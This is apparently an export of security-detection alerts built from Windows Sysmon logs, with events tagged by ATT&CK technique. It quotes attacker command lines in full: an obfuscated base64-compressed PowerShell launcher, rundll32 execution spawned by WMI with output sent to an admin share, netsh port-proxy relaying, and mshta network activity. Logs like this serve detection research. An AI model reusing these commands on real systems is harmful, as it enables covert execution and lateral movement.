R64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.598592Z"">
</TimeCreated>
<EventRecordID>4949</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.357</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010A7398B00</Data>
<Data Name=""ProcessId"">3868</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
</TimeCreated>
<EventRecordID>421227</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
<Data Name=""ProcessId"">2784</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.16 ) to hostname ( ) , IP ( 10.0.2.17 ) and port ( 55683 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T01:29:05.534521Z"">
</TimeCreated>
<EventRecordID>17590</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2000"" ThreadID=""1980"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 01:29:00.318</Data>
<Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">false</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.16</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">49168</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.17</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">55683</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
</TimeCreated>
<EventRecordID>421227</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
<Data Name=""ProcessId"">2784</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
</TimeCreated>
<EventRecordID>421227</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
<Data Name=""ProcessId"">2784</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c set &gt; c:\users\\public\netstat.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-11-03T13:51:58.263043Z"">
</TimeCreated>
<EventRecordID>56509</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3180"" ThreadID=""4224"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-11-03 13:51:56.380</Data>
<Data Name=""ProcessGuid"">747F3D96-DB7C-5DBE-0000-0010CF6B9502</Data>
<Data Name=""ProcessId"">5004</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c set &gt; c:\users\\public\netstat.txt</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\sqlsvc</Data>
<Data Name=""LogonGuid"">747F3D96-CE3B-5DBE-0000-00201ED50100</Data>
<Data Name=""LogonId"">0x1d51e</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-CE42-5DBE-0000-0010EE430200</Data>
<Data Name=""ParentProcessId"">3936</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe&quot; -sSQLEXPRESS</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-12-15T15:00:15.695478Z"">
</TimeCreated>
<EventRecordID>589975</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3524"" ThreadID=""4288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-12-15 15:00:14.470</Data>
<Data Name=""ProcessGuid"">747F3D96-CF4B-5FD8-0000-00101AD58700</Data>
<Data Name=""ProcessId"">6976</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10</Data>
<Data Name=""SourcePort"">50008</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.17</Data>
<Data Name=""DestinationHostname"">MSEDGEWIN10CLONE</Data>
<Data Name=""DestinationPort"">49666</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.543692Z"">
</TimeCreated>
<EventRecordID>4948</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.355</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-001029398B00</Data>
<Data Name=""ProcessId"">6760</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
</TimeCreated>
<EventRecordID>17589</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2000"" ThreadID=""1960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
<Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
<Data Name=""LogonId"">0x1070ce</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
<Data Name=""ParentProcessId"">596</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
</TimeCreated>
<EventRecordID>17589</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2000"" ThreadID=""1960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
<Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
<Data Name=""LogonId"">0x1070ce</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
<Data Name=""ParentProcessId"">596</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
